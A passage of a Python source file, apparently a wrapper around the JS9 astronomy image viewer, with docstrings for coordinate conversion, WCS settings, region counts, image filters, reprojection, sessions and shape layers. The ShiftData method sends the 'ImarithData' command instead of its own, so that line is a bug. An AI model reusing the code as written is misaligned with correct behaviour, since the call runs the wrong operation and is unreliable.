return self.send({'cmd': 'ImageToDisplayPos', 'args': args})
def DisplayToImagePos(self, *args):
"""
Get the image coordinates from the display coordinates
call:
ipos = JS9.DisplayToImagePos(dpos)
where:
- dpos: display position object containing x and y display
coordinate values
returns:
- ipos: image position object containing x and y image coordinate
values
Note that image coordinates are one-indexed, as per FITS conventions,
while display coordinate are 0-indexed.
"""
return self.send({'cmd': 'DisplayToImagePos', 'args': args})
def ImageToLogicalPos(self, *args):
"""
Get the logical coordinates from the image coordinates
call:
lpos = JS9.ImageToLogicalPos(ipos, lcs)
where:
- ipos: image position object containing x and y image coordinate
values
returns:
- lpos: logical position object containing x and y logical
coordinate values
Logical coordinate systems include: 'physical' (defined by LTM/LTV
keywords in a FITS header), 'detector' (DTM/DTV keywords), and
'amplifier' (ATM/ATV keywords). Physical coordinates are the most
common. In the world of X-ray astronomy, they refer to the 'zoom 1'
coordinates of the data file.
This routine will convert from image to logical coordinates. By
default, the current logical coordinate system is used. You can specify
a different logical coordinate system (assuming the appropriate
keywords have been defined).
"""
return self.send({'cmd': 'ImageToLogicalPos', 'args': args})
def LogicalToImagePos(self, *args):
"""
Get the image coordinates from the logical coordinates
call:
ipos = JS9.LogicalToImagePos(lpos, lcs)
where:
- lpos: logical position object containing x and y logical
coordinate values
returns:
- ipos: image position object containing x and y image coordinate
values
Logical coordinate systems include: 'physical' (defined by LTM/LTV
keywords in a FITS header), 'detector' (DTM/DTV keywords), and
'amplifier' (ATM/ATV keywords). Physical coordinates are the most
common. In the world of X-ray astronomy, they refer to the 'zoom 1'
coordinates of the data file.
This routine will convert from logical to image coordinates. By
default, the current logical coordinate system is used. You can specify
a different logical coordinate system (assuming the appropriate
keywords have been defined).
"""
return self.send({'cmd': 'LogicalToImagePos', 'args': args})
def GetWCSUnits(self, *args):
"""
Get the current WCS units
call:
unitsstr = JS9.GetWCSUnits()
returns:
- unitstr: 'pixels', 'degrees' or 'sexagesimal'
"""
return self.send({'cmd': 'GetWCSUnits', 'args': args})
def SetWCSUnits(self, *args):
"""
Set the current WCS units
call:
JS9.SetWCSUnits(unitsstr)
where:
- unitstr: 'pixels', 'degrees' or 'sexagesimal'
Set the current WCS units.
"""
return self.send({'cmd': 'SetWCSUnits', 'args': args})
def GetWCSSys(self, *args):
"""
Get the current World Coordinate System
call:
sysstr = JS9.GetWCSSys()
returns:
- sysstr: current World Coordinate System ('FK4', 'FK5', 'ICRS',
'galactic', 'ecliptic', 'image', or 'physical')
"""
return self.send({'cmd': 'GetWCSSys', 'args': args})
def SetWCSSys(self, *args):
"""
Set the current World Coordinate System
call:
JS9.SetWCSSys(sysstr)
where:
- sysstr: World Coordinate System ('FK4', 'FK5', 'ICRS',
'galactic', 'ecliptic', 'image', or 'physical')
Set current WCS system. The WCS systems are available only if WCS
information is contained in the FITS header. Also note that 'physical'
coordinates are the coordinates tied to the original file. They are
mainly used in X-ray astronomy where individually detected photon
events are binned into an image, possibly using a blocking factor. For
optical images, image and physical coordinate usually are identical.
"""
return self.send({'cmd': 'SetWCSSys', 'args': args})
def DisplayMessage(self, *args):
"""
Display a text message
call:
JS9.DisplayMessage(which, text)
where:
- which: "info" or "regions"
- text: text to display
The text string is displayed in the "info" area (usually occupied by the
valpos display) or the "region" area (where regions are displayed). The
empty string will clear the previous message.
"""
return self.send({'cmd': 'DisplayMessage', 'args': args})
def DisplayCoordGrid(self, *args):
"""
Display a WCS-based coordinate grid
call:
JS9.DisplayCoordGrid(mode, opts)
where:
- mode: true (display) or false (hide)
- opts: optional object or json string containing grid parameters
A coordinate grid displays lines of constant RA and constant Dec, with
the points of intersection labeled by their RA and Dec values. The
labels are in sexagesimal notation if the WCS units are sexagesimal,
otherwise they are in degrees. When using sexagesimal notation, labels
will be shortened if possible, e.g., if the RA hours are the same in
two successive labels but the minutes are different, only the minutes
are shown in the second label.
If no arguments are supplied, the routine returns true if the
coordinate grid is currently being displayed, false otherwise. A
boolean first argument specifies whether to display the coordinate
grid or not.
The optional second argument is an opts object (or a json-formatted
string) containing properties to override the default JS9.Grid.opts
properties. These properties include:
- raLines: approx. number of RA grid lines
- decLines: approx. number of Dec grid lines
- stride: fineness of grid lines
- margin: edge margin for displaying a line
- lineColor: color of grid lines
- strokeWidth: grid stroke width
- raAngle: rotation for RA label
- decAngle: rotation for Dec label
- labelColor: color of text labels
- labelFontFamily: label font
- labelFontSize: label font size
- labelRAOffx: x offset of RA labels
- labelRAOffy: y offset of RA labels
- labelDecOffx: x offset of Dec labels
- labelDecOffy: y offset of Dec labels
- degPrec: precision for degree labels
- sexaPrec: precision for sexagesimal labels
- reduceDims: reduce lines of smaller image dim?
- cover: grid lines cover: display or image
The strokeWidth property determines the width of the grid
lines. It also serves as a reminder that you can pass other
standard shape properties in the opts object.
JS9's label placement algorithm puts labels close to the
intersection of RA and Dec lines. A number of properties can be
useful in cases where this simple algorithm is not sufficient:
the raAngle and decAngle properties allow you to rotate the
labels with respect to the grid lines. The four
label[RA,Dec]Off[x,y] properties allow you to move the label with
respect to the grid lines. The raSkip and decSkip properties
allow you to skip labelling the first available lines within the
display. It can be useful, for example, on a rotated image, when
the labels are placed in a corner.
The degPrec and sexaPrec properties specify the precision for
degree values and segagesimal values, respectively. Higher
precision will use more digits and take more space along each line.
A number of properties are (more or less) internal but might be
of use: the reduceDims property will reduce the raLines and
decLines properties by the ratio of image dimensions if one
dimension is smaller than the other. This can prevent crowding in
the smaller dimension. The stride property specifies the length
of each line segment that together make up a grid line. A smaller
stride might make the grid lines smoother in some cases, at the
price of more processing time. The cover property determines
whether the grid is drawn over the entire image or just the
displayed part of the image. At the moment, drawing lines over
the displayed part of the image seems to be sufficient.
Note that you can specify global site-wide values for all these
parameters (overriding the JS9.Grid.opts defaults) by supplying them
in a grid object within the globalOpts object in the js9prefs.js file.
Example: display a coordinate grid, specifying the line color:
>>> JS9.DisplayCoordGrid(true, {lineColor: "pink"});
"""
return self.send({'cmd': 'DisplayCoordGrid', 'args': args})
def CountsInRegions(self, *args):
"""
Get background-subtracted counts in regions
call:
JS9.CountsInRegions(sregion, bregion, opts)
where:
- sregion: source region ("$sregions" for displayed source regions)
- bregion: background region ("$bregions" for displayed bkgd regions)
- opts: optional object or json string containing region parameters
The regcnts program (and its predecessor, funcnts) counts photons in
specified source regions and optionally, in specified background
regions. Displayed results include the bkgd-subtracted counts in each
region, as well as the error on the counts, the area in each region,
and the surface brightness (cnts/area**2) calculated for each region.
Regcnts for desktop use is available on GitHub at:
https://github.com/ericmandel/regions.
The regcnts program has been compiled into JS9 using Emscripten.
Using this routine, regcnts can be run on the FITS memory-based file
for the currently displayed image. The first two arguments specify
the source region(s) and background region(s), respectively.
You can pass a standard region specifier as the source
or background region. If the string "$sregions" ("$bregions") is
specified, the source (background) regions are taken from the
currently displayed image.
In keeping with how desktop regcnts works, if no argument or null or a
null string is specified as the source region, the entire field is
used as the source region. If no argument or null or a null string is
explicitly specified as a background region, no regions are used for
the background. In particular, if you pass only the source region
argument, or pass only the source region and opts arguments, no
background region is used. To recap:
>>> # use entire field, no background
>>> JS9.CountsInRegions([opts])
>>> JS9.CountsInRegions("field"||null||""[, opts])
>>> # use displayed source and displayed background
>>> JS9.CountsInRegions("$sregions", "$bregions"[, opts])
>>> # use displayed source, no background
>>> JS9.CountsInRegions("$sregions"[, opts])
>>> # use displayed source and specified background
>>> JS9.CountsInRegions("$sregions", bregions[, opts])
>>> # use specified source, no background
>>> JS9.CountsInRegions(sregions[, opts])
>>> # use specified source and specified background
>>> JS9.CountsInRegions(sregions, bregions[, opts])
>>> # use specified source and displayed background
>>> JS9.CountsInRegions(sregions, "$bregions"[, opts])
>>> # use entire field and specified background
>>> JS9.CountsInRegions("field"||null||"", bregions[, opts])
>>> # use entire field and displayed background
>>> JS9.CountsInRegions("field"||null||"", "$bregions"[, opts])
The third argument allows you to specify options to regcnts:
- cmdswitches: command line switches passed to regcnts
- dim: size of reduced image (def: max of JS9.globalOpts.image.[xy]dim)
- reduce: reduce image size? (def: true)
- lightwin: if true, results displayed in light window
The command line switches that can be specified in cmdswitches are
detailed in https://js9.si.edu/regions/regcnts.html, the regcnts help
page. Aside from switches which control important aspects of the
analysis, the "-j" switch (which returns the output in JSON format)
might be useful in the browser environment. Some examples:
>>> # display results in a light window
>>> JS9.CountsInRegions({lightwin: true})
>>> # return json using maximum precision in output
>>> JS9.CountsInRegions({cmdswitches: "-j -G"})
Results are also returned as a text string.
The regcnts code is memory (and cpu) intensive. In the desktop
environment, this is not typically a problem, but the
memory-constrained browser environment can present a challenge for
large images and binary tables. To avoid running out of memory (and
for large images, to speed up processing considerably), the
CountsInRegions() routine will bin the image to reduce its size,
unless the reduce option is explicitly set to false. The binned
image size can be specified by the dim option, defaulting to
the global value of the image dimension options. When a file is binned
in this manner, the returned resolution value (e.g., arcsec/pixel)
will reflect the applied binning. Note that the number of photons
found inside a binned and unbinned region differ slightly, due to the
difference in the pixel boundaries in the two cases.
The Counts in Regions option of the Analysis -> Client-side
Analysis menu runs regcnts on the source and background regions of
the currently displayed image. The results are displayed in a light
window.
Finally, note that the main JS9 web site at https://js9.si.edu
also offers regcnts as a server-based analysis program in the
Analysis menu. The displayed source and background regions are passed
to the server for processing. Because this version runs the desktop
program, it runs on the original file and does no binning to reduce
the image size (which, by the way, could lengthen the processing
time). But the server-side task also can be useful for
JS9 large file support, which involves displaying a small
representation file associated with a much larger parent
file stored on the server. In this case, you often want to run
the analysis on the larger (original) file.
"""
return self.send({'cmd': 'CountsInRegions', 'args': args})
def GaussBlurData(self, *args):
"""
Gaussian blur of raw data
call:
JS9.GaussBlurData(sigma, opts)
where:
- sigma: sigma of Gaussian function
- opts: options object
This routine creates a new raw data layer called "gaussBlur"
in which the image pixel values are blurred using a Gaussian
function with the specified sigma. The routine uses the fast
Gaussian blur algorithm (approximating a full Gaussian blur
with three passes of a box blur) described in:
http://blog.ivank.net/fastest-gaussian-blur.html.
"""
return self.send({'cmd': 'GaussBlurData', 'args': args})
def ImarithData(self, *args):
"""
Perform image arithmetic on raw data
call:
JS9.ImarithData(op, arg1, opts)
where:
- op: image operation: "add", "sub", "mul", "div",
"min", "max", "reset"
- arg1: image handle, image id or numeric value
- opts: options object
The JS9.ImarithData() routine performs basic arithmetic
(addition, subtraction, multiplication, division, minimum,
maximum, average) between the currently displayed image and
either another image or a constant value. The first op
argument is a string, as detailed above. The second arg1
argument can be a numeric value or an image id. In the former
case, the constant value is applied to each pixel in the
image. In the latter case, the operation is performed between
the corresponding pixels in the two images. For example:
>>> JS9.ImarithData("max", "foo.fits")
will make a new data layer of the currently displayed image, where
each pixel is the larger value from that image and the foo.fits image
(which can be in any display).
This routine creates a new raw data layer called "imarith"
containing the results of the operation. Successive calls to
this routine are cumulative, so that you can build up a more
complex operation from simple ones. For example:
>>> # foo.fits is displayed in the "myJS9" display
>>> myim = JS9.GetImage()
>>> JS9.ImarithData("max", myim)
>>> JS9.ImarithData("add", 2.718)
will make a new data layer where each pixel is the larger value from
the two images, after which an approximation of the irrational number
e is added to each pixel.
The special reset operation deletes the "imarith" raw data
layer, allowing you to start afresh.
The bitpix value of the new "imarith" layer is chosen as follows:
- for operations between two images, bitpix the "larger" of
the two images (where float is "larger" than int).
- for operations between an image and a constant, bitpix of -32
(single float) is chosen unless the image itself has bitpix of -64, in
which case the double float bitpix is chosen.
You can override the choice of bitpix by passing a bitpix property
in the optional opts object.
Finally, note that the two images must have the same dimensions. We
might be able to remove this restriction in the future, although
it is unclear how one lines up images of different dimensions.
"""
return self.send({'cmd': 'ImarithData', 'args': args})
def ShiftData(self, *args):
"""
Shift raw data
call:
JS9.ShiftData(x, y, opts)
where:
- x: number of pixels to shift in the x (width) direction
- y: number of pixels to shift in the y (height) direction
- opts: options object
This routine creates a new raw data layer called "shift" in which
the pixels are shifted from the original image array by the specified
amount in x and/or y. The results of successive shifts are
cumulative. The routine is used by the Harvard-Smithsonian Center for
Astrophysics MicroObservatory project interactively to align images
that are only slightly offset from one another.
"""
return self.send({'cmd': 'ImarithData', 'args': args})
def FilterRGBImage(self, *args):
"""
Apply a filter to the RGB image
call:
JS9.FilterRGBImage(filter, args)
where:
- filter: name of image filter to apply to the RGB data
- args: filter-specific arguments, where applicable
In JS9, you can change the raw data (and hence the displayed
image) using routines such as JS9.GaussBlurData() or the more
general JS9.RawDataLayer(). You also can apply image
processing techniques directly to the displayed RGB image
without changing the underlying raw data, using this
routine. The web has an overwhelming amount of information
about image processing. A good technical article concerning
the use of image filters with Javascript and the HTML5 canvas
is available at:
http://www.html5rocks.com/en/tutorials/canvas/imagefilters/
The JS9.FilterRGBImage() routine supports a number of image
processing routines, which are listed below. To call one of
them using JS9.FilterRGBImage(), supply the filter name,
followed by any filter-specific arguments, e.g.:
>>> JS9.FilterRGBImage("luminance")
>>> JS9.FilterRGBImage("duotone", "g")
>>> JS9.FilterRGBImage("convolve", [-1,-1,-1,-1,8,-1,-1,-1,-1])
You can, of course, use the default arguments where applicable.
Note that the standard JS9 colormaps, scale, contrast and bias
selections are applied to the raw data to regenerate the RGB
image. Thus, if you use any of the image processing techniques
listed below and then change colormap, contrast, bias, or
scale, you will undo the applied image processing. This is a
good way to reset the displayed image. The same thing can be
accomplished programmatically by specifying "reset" as the
filter name:
>>> JS9.FilterRGBImage("reset")
The following simple image processing filters are available:
- luminance():convert to greyscale using the CIE luminance:
0.2126*r + 0.7152*g + 0.0722*b
- greyscale():convert to greyscale using the standard greyscale:
0.3*r + 0.59*g + 0.11*b
- greyscaleAvg():convert to greyscale using averaging:
(r+g+b) / 3
- brighten(val): add const val to each pixel to change the brightness:
[r + val, g + val, b + val]
- noise(v1, v2): add random noise:
pixel += Math.floor((Math.random()*(v2-v1)) - v2),
defaults are v1=-30, v2=30
- duotone("r"|"g"|"b"): remove a color by setting it to
the avg of the two others: r=(g+b)/2, default color is "r"
- invert(): the RGB channels of the image are inverted:
[255-r, 255-g, 255-b, a]
- pixelate(size):make image look coarser by creating a square tiling
effect of the specified size, default size is 2
- sepia(): image takes on shades of brown, like an antique photograph
- contrast(val): change the difference in brightness between the min
and max intensity of a pixel, default val is 2
- threshold(thresh, low, high):create a two-color image in which pixels
less bright than thresh are assigned the low value (default 0 for
black), otherwise the high value (default: 255 for white)
- gamma(gcorr): apply the nonlinear gamma operation, used to code and
decode luminance values in video or still image systems:
out = pow(in, gcorr), default gcorr is 0.2
- posterize(): convert a smooth gradation of tone to regions
of fewer tones, with abrupt changes between them
- scatter(): scatters the colors of a pixel in its neighborhood, akin
to viewing through brittle cracked glass
- solarize(): which image is wholly or partially reversed in
tone. Dark areas appear light or light areas appear dark.
The following image convolutions are available:
- convolve(weights, [opaque]) convolve the image using the
weights array as a square convolution matrix. If opaque is true
(default), the image will have an opaque alpha channel, otherwise the
alpha is convolved as well.
- sobel(): use the Sobel operator to create an image that
emphasizes the edges
- medianFilter(): noise reduction technique that replaces each
pixel with the median of neighboring pixels
- gaussBlur5(): image pixel values are blurred using a 5x5 Gaussian
- edgeDetect(): detect edges using the kernel
[ -1, -1, -1, -1, 8, -1, -1, -1, -1 ]
- sharpen(val): sharpen the image using the kernel
[ 0, -3, 0, -3, val, -3, 0, -3, 0 ]
- blur(): blur the image using the kernel
[ 1, 2, 1, 2, 1, 2, 1, 2, 1 ]
- emboss(val): produce embossing effect using the kernel
[-18, -9, 9, -9, 100 - val, 9, 0, 9, 18 ]
- lighten(val): apply the kernel
[ 0, 0, 0, 0, val, 0, 0, 0, 0 ],
default val of 12/9 lightens the image
- darken(val): apply the kernel
[ 0, 0, 0, 0, val, 0, 0, 0, 0],
default val of 6/9 darkens the image
With no arguments, the routine returns an array of available filters:
>>> JS9.FilterRGBImage()
["convolve", "luminance", ..., "blur", "emboss", "lighten", "darken"]
"""
return self.send({'cmd': 'FilterRGBImage', 'args': args})
def ReprojectData(self, *args):
"""
Reproject an image using a specified WCS
call:
JS9.ReprojectData(wcsim, opts)
where:
- wcsim: image containing the WCS used to perform the reprojection
- opts: options object
JS9.ReprojectData() creates a new raw data layer (with default id of
"reproject") in which the pixels are reprojected using the WCS from
another image. The mProjectPP program from the Montage software suite
is used to perform the reprojection. Please read the documentation on
mProjectPP from the Montage web site, which includes this explanation:
mProjectPP performs a plane-to-plane transform on the input
image, and is an adaptation of the Mopex algorithm and
developed in collaboration with the Spitzer Space
Telescope. It provides a speed increase of approximately a
factor of 30 over the general-purpose mProject. However,
mProjectPP is only suitable for projections which can be
approximated by tangent-plane projections (TAN, SIN, ZEA, STG,
ARC), and is therefore not suited for images covering large
portions of the sky. Also note that it does not directly
support changes in coordinate system (i.e. equatorial to
galactic coordinates), though these changes can be facilitated
by the use of an alternate header.
The wcsim argument is an image id, image filename, or image
object pointing to the WCS image.
The opts object can contain the following reproject-specific props:
- rawid: the id of the raw data layer to create (default: "reproject")
- cmdswitches: a string containing mProjectPP command line switches
The cmdswitches will be prepended to the mProjectPP command line:
{cmdswitches: "-d 1 -z .75"}
will set the mProjectPP debugging and the drizzle factor,
resulting in a command line that looks like this:
mProjectPP -d 1 -z .75 -s statusfile in.fits out.fits template.hdr
See the mProjectPP documentation for more information about
command switches.
Reprojection is an intensive process which can take a
considerable amount of memory and processing time. To avoid
crashes, we currently restrict the WCS image size used for
reprojection to a value defined by JS9.REPROJDIM, currently
2200 x 2200. Even this might be too large for iOS devices
under certain circumstances, although issues regarding memory
are evolving rapidly.
"""
return self.send({'cmd': 'ReprojectData', 'args': args})
def RotateData(self, *args):
"""
Rotate an image around the WCS CRPIX point
call:
JS9.RotateData(angle, opts)
where:
- angle: rotation angle in degrees
- opts: options object
The JS9.RotateData() routine uses JS9.ReprojectData() to rotate
image data by the specified angle (in degrees). If the string
"northup" or "northisup" is specified, the rotation angle is set to 0.
The rotation is performed about the WCS CRPIX1, CRPIX2 point.
The optional opts object is passed directly to the JS9.ReprojectData()
routine. See JS9.ReprojectData() above for more information.
"""
return self.send({'cmd': 'RotateData', 'args': args})
def SaveSession(self, *args):
"""
Save an image session to a file
call:
JS9.SaveSession(session)
where:
- session: name of the file to create when saving this session
This routine saves all essential session information about the
currently displayed image (filename, scaling, colormap, contrast/bias,
zoom, regions, catalogs, etc) in a json-formatted file. You can
subsequently load this file into JS9 to restore the image session.
The session file is a text file and can be edited, subject to the
usual rules of json formatting. For example, you can change the
colormap, scaling, etc. after the fact.
Don't forget that the file is saved by the browser, in whatever
location you have set up for downloads.
The session file contains a file property near the top that
specifies the location of the image. A local file usually will
contain an absolute path or a path relative to the web page
being displayed. However, if the image was originally opened
using drag-and-drop, no pathname information is available, in
accordance with standard web security protocols. In this case,
you must edit the session file to supply the path (either
absolute or relative to the web page) before re-loading the
session.
"""
return self.send({'cmd': 'SaveSession', 'args': args})
def LoadSession(self, *args):
"""
Load a previously saved image session from a file
call:
JS9.LoadSession(session)
where:
- session: name of the session file to load
Restore an image session by loading a json-formatted session file. The
image itself is retrieved and loaded, and all of the saved parameters
and graphics (scale, colormap, regions, catalogs etc) are applied to
the display.
The session file contains a file property near the top that
specifies the location of the image. A local file usually will
contain an absolute path or a path relative to the web page
being displayed. However, if the image was originally opened
using drag-and-drop, no pathname information is available, in
accordance with standard web security protocols. In this case,
you must edit the session file to supply the path (either
absolute or relative to the web page) before re-loading the
session.
Note that the raw data file itself is not saved (only its
pathname), so you must have access to that file in order to
restore a session. However, the data file need not be in the
same location as it was originally: you can adjust the path of
the data file by editing the file property as needed.
"""
return self.send({'cmd': 'LoadSession', 'args': args})
def NewShapeLayer(self, *args):
"""
Create a new shape layer
call:
lid = JS9.NewShapeLayer(layer, opts)
where:
- layer: name of the layer to create
- opts: default options for this layer
returns:
- lid: layer id
This routine creates a new named shape layer. You can then, add,
change, and remove shapes in this layer using the routines below. The
catalogs displayed by the Catalog plugin are examples of separate shape
layers. The optional opts parameter allows you to specify default
options for this layer. You can set a default for any property needed
by your shape layer. See JS9.Regions.opts in js9.js for an example of
the default options for the regions layer.
"""
return self.send({'cmd': 'NewShapeLayer', 'args': args})
def ShowShapeLayer(self, *args):
"""
Show or hide the specified shape layer
call:
JS9.ShowShapeLayer(layer, mode)
where:
- layer: name of layer
- mode: true (show layer) or false (hide layer)
Shape layers can be hidden from display. This could be useful, for
example, if you have several catalogs loaded into a display and want to
view one at a time.
If mode is true, a previously hidden shape layer will be displayed. If
mode is false, a displayed shape layer will be hidden. If the
mode argument is not supplied, the current mode is returned.
"""
return self.send({'cmd': 'ShowShapeLayer', 'args': args})
def ToggleShapeLayers(self, *args):
"""
Toggle display of the active shape layers
call:
JS9.ToggleShapeLayers()
While ShowShapeLayer() allows you to display or hide a single shape
layer, this routine will toggle display of all active layers in the
current image. An active layer is one that has not been turned off
usng the Shape Layers plugin or ShowShapeLayer().
The routine remembers which layers were active at the moment when
layers are hidden and restores only those layers in the next toggle.
Thus, if you have two layers, "regions" and "catalog1", and the
"catalog1" layer has previously been turned off, calling this routine
repeatedly will turn on and off the "regions" layer only.
"""
return self.send({'cmd': 'ToggleShapeLayers', 'args': args})
def ActiveShapeLayer(self, *args):
"""
Make the specified shape layer the active layer
call:
JS9.ActiveShapeLayer(layer)
where:
- layer: name of layer
returns:
- active: the active shape layer (if no args are specified)
For a given image, one shape layer at a time is active, responding to
mouse and touch events. Ordinarily, a shape layer becomes the active
layer when it is first created and shapes are added to it. Thus, the
first time you create a region, the regions layer becomes active. If
you then load a catalog into a layer, that layer becomes active.
If no arguments are supplied, the routine returns the currently active
layer. Specify the name of a layer as the first argument to make it
active. Note that the specified layer must be visible.
"""
return self.send({'cmd': 'ActiveShapeLayer', 'args': args})
def AddShapes(self, *args):
"""
Add one or more shapes to the specified layer
call:
JS9.AddShapes(layer, sarr, opts)
where:
- layer: name of layer
- sarr: a shape string, shape object, or an array of shape objects
- opts: global values to apply to each created shape
returns:
- id: id of last shape created
The sarr argument can be a shape ('annulus', 'box', 'circle',
'ellipse', 'point', 'polygon', 'text'), a single shape object, or an
array of shape objects. Shape objects contain one or more properties,
of which the most important are:
- shape: 'annulus', 'box', 'circle', 'ellipse', 'point', 'polygon',
'text' [REQUIRED]
- x: image x position
- y: image y position
- dx: increment from current image x position
- dy: increment from current image y position
- tags: comma separated list of tag strings
- radii: array of radii for annulus shape
- width: width for box shape
- height: height for box shape
- radius: radius value for circle shape
- r1: x radius for ellipse shape (misnomer noted)
- r2: y radius for ellipse shape (misnomer noted)
- pts: array of objects containing x and y positions, for polygons
- points: array of objects containing x and y offsets from the
specified center, for polygons
- angle: angle in degrees for box and ellipse shapes
- color: shape color (string name or #rrggbb syntax)
- text: text associated with text shape
Other available properties include:
- fixinplace: if true, shape cannot be moved or resized
- lockMovementX: shape cannot be moved in the x direction
- lockMovementY: shape cannot be moved in the y direction
- lockRotation: shape cannot be rotated
- lockScalingX: shape cannot be resized in the x direction
- lockScalingY: shape cannot be resized in the y direction
- fontFamily: font parameter for text shape
- fontSize: font parameter for text shape
- fontStyle: font parameter for text shape
- fontWeight: font parameter for text shape
"""
return self.send({'cmd': 'AddShapes', 'args': args})
def RemoveShapes(self, *args):
"""
Remove one or more shapes from the specified shape layer
call:
JS9.RemoveShapes(layer, shapes)
where:
- layer: name of layer
- shapes: which shapes to remove
If the shapes argument is not specified, it defaults to "all". You
can specify a selector using any of the following:
- all: all shapes not including child text shapes
- All: all shapes including child text shapes
- selected: the selected shape (or shapes in a selected group)
- [color]: shapes of the specified color
- [shape]: shapes of the specified shape
- [wcs]: shapes whose initial wcs matches the specified wcs
- [tag]: shapes having the specified tag
- /[regexp]/: shapes with a tag matching the specified regexp
- child: a child shape (i.e. text child of another shape)
- parent: a shape that has a child (i.e. has a text child)
"""
return self.send({'cmd': 'RemoveShapes', 'args': args})
def GetShapes(self, *args):
"""
Get information about one or more shapes in the specified shape
layer
call:
JS9.GetShapes(layer, shapes)
where:
- layer: name of layer
- shapes: which shapes to retrieve
returns:
- sarr: array of shape objects
Each returned shape object contains the following properties:
- id: numeric region id (assigned by JS9 automatically)
- mode: 'add', 'remove', or 'change'
- shape: region shape ('annulus', 'box', 'circle', 'ellipse',
'point', 'polygon', 'text')
- tags: comma delimited list of region tags (e.g., 'source',
'include')
- color: region color
- x,y: image coordinates of region
- size: object containing width and height for box region
- radius: radius value for circle region
- radii: array of radii for annulus region
- eradius: object containing x and y radii for ellipse regions
- pts: array of objects containing x and y positions, for polygons
- angle: angle in degrees for box and ellipse regions
"""
return self.send({'cmd': 'GetShapes', 'args': args})
def ChangeShapes(self, *args):
"""
Change one or more shapes in the specified layer
call:
JS9.ChangeShapes(layer, shapes, opts)
where:
- layer: name of layer
- shapes: which shapes to change
- opts: object containing options to change in each shape
Change one or more shapes. The opts object can contain the parameters
described in the JS9.AddShapes() section. However, you cannot (yet)
change the shape itself (e.g. from 'box' to 'circle').
If the shapes argument is not specified, it defaults to "all". You
can specify a selector using any of the following:
- all: all shapes not including child text shapes
- All: all shapes including child text shapes
- selected: the selected shape (or shapes in a selected group)
- [color]: shapes of the specified color
- [shape]: shapes of the specified shape
- [wcs]: shapes whose initial wcs matches the specified wcs
- [tag]: shapes having the specified tag
- /[regexp]/: shapes with a tag matching the specified regexp
- child: a child shape (i.e. text child of another shape)
- parent: a shape that has a child (i.e. has a text child)
"""
return self.send({'cmd': 'ChangeShapes', 'args': args})
def CopyShapes(self, *args):
"""
Copy a shape layer to another image
call:
JS9.CopyShapes(to, layer)
where:
- to: image id to which to copy shapes
- layer: shape layer to copy
Copy regions to a different image. If to is "all", then the
regions are copied to all images.
All shapes in the shape layer are copied to the new image.
"""
return self.send({'cmd': 'CopyShapes', 'args': args})
def SelectShapes(self, *args):
"""
Gather Shapes into a Selection
call:
JS9.SelectShapes(layer, shapes)
where:
- layer: shape layer
- shapes: which shapes to select
JS9 has a rich mouse-based interface for selecting shapes: a single
shape is selected by clicking on it. A number of shapes can be
gathered into a group selection by pressing the left mouse button and
dragging the mouse over the desired shapes. To add to an
already-existing selection, shift-click the mouse on a shape.
This routine allows you to create a selection programmatically by
specifying which shapes make up the selection. The first argument
is the shape layer. The second argument is the regions selection.
If not specified, it defaults to "all". The call creates a selection
of shapes which can be moved as one unit.
For example:
>>> j.SelectShapes("myreg", "circle") # select all circles
>>> j.SelectShapes("myreg", "circle&&!foo2") # circles w/o 'foo2' tag
Regions in a selection are processed individually, i.e. a regions
selection will match the regions inside a group. Thus for example,
if you create a selection containing circles, changing the color using
the "circle" specification will also affect the circles within the
selection. You can, of course, process only the regions inside a
selection using the selected specification.
"""
return self.send({'cmd': 'SelectShapes', 'args': args})
def UnselectShapes(self, *args):
    """
    Remove shapes from a selection
    call:
    JS9.UnselectShapes(layer, shapes)
    where:
    - layer: shape layer
    - shapes: which shapes to unselect
    If shapes is unspecified, "all", or "selected", the current selection
    is undone. Otherwise a new selection is made that omits the specified
    shapes, and that selection can be moved as one unit.
    """
    # relay the unselect request to the JS9 back-end
    payload = {'cmd': 'UnselectShapes', 'args': args}
    return self.send(payload)
def GroupShapes(self, *args):
    """
    Gather shapes into a long-lived group
    call:
    JS9.GroupShapes(layer, shapes, opts)
    where:
    - layer: shape layer
    - shapes: which shapes to group (def: 'selected' if a selection
      exists, otherwise 'all')
    - opts: optional object containing grouping options
    returns:
    - groupid: the group id associated with the newly created group
    A shape group can be moved and resized as a single unit; unlike a
    temporary selection (dissolved by clicking outside it), a group is
    dissolved only by calling j.UngroupShapes().
    The optional opts argument contains the following properties:
    - groupid: the group id to use, if possible (default: 'group_[n]';
      an integer is appended if the id is already taken)
    - select: if false, the group is not selected upon creation
    The returned groupid string can be used to select and process all the
    shapes in that group:
    >>> gid = j.GroupShapes('myreg', 'circle && foo1');
    >>> j.ChangeShapes('myreg', gid, {'color':'red'});
    Note that shapes in a group are not matched by non-groupid shape
    selectors:
    >>> j.ChangeShapes('myreg', 'circle', {'color':'cyan'}) # no
    >>> j.ChangeShapes('myreg', gid, {'color':'red'});      # yes
    A shape can belong to only one group at a time; the
    globalOpts.regGroupConflict property ('skip' by default, or 'error')
    controls how an already-grouped shape is handled.
    """
    # NOTE(review): previous docstring called the first argument the
    # "regions selection"; per the call signature it is the layer name.
    return self.send({'cmd': 'GroupShapes', 'args': args})
def UngroupShapes(self, *args):
    """
    Dissolve a group of shapes
    call:
    JS9.UngroupShapes(layer, groupid, opts)
    where:
    - layer: shape layer
    - groupid: group id of the group to dissolve (as returned by
      JS9.GroupShapes())
    - opts: optional object containing ungrouping options
    The optional opts argument supports:
    - select: if true, the newly separate shapes are 'selected'
      (e.g. so they can be removed with the Delete key)
    For example:
    >>> gid = j.GroupShapes('myreg', 'circle || ellipse')
    >>> j.UngroupShapes('myreg', gid)
    """
    # pass the ungroup request through to JS9
    message = dict(cmd='UngroupShapes', args=args)
    return self.send(message)
def AddRegions(self, *args):
    """
    Add one or more regions to the regions layer
    call:
    id = JS9.AddRegions(rarr, opts)
    where:
    - rarr: a shape string, region object or an array of region objects
    - opts: global values to apply to each created region
    returns:
    - id: id of last region created
    rarr can be a region shape ('annulus', 'box', 'circle', 'ellipse',
    'point', 'polygon', 'text'), a single region object, or an array of
    region objects. The most important region-object properties are:
    - shape: one of the shapes above [REQUIRED]
    - x, y: image position; dx, dy: increments from the current position
    - lcs: object containing logical x, y and sys (e.g. 'physical')
    - tags: comma separated list of tag strings
    - radii (annulus); width, height (box); radius (circle);
      r1, r2 (ellipse x/y radii; misnomer noted)
    - pts: array of x,y positions for polygons; points: array of x,y
      offsets from the center for polygons
    - angle: angle in degrees for box and ellipse regions
    - color: region color (string name or #rrggbb syntax)
    - text: text associated with text region
    Other available properties include: fixinplace, lockMovementX,
    lockMovementY, lockRotation, lockScalingX, lockScalingY, and the
    text-region font parameters fontFamily, fontSize, fontStyle,
    fontWeight.
    """
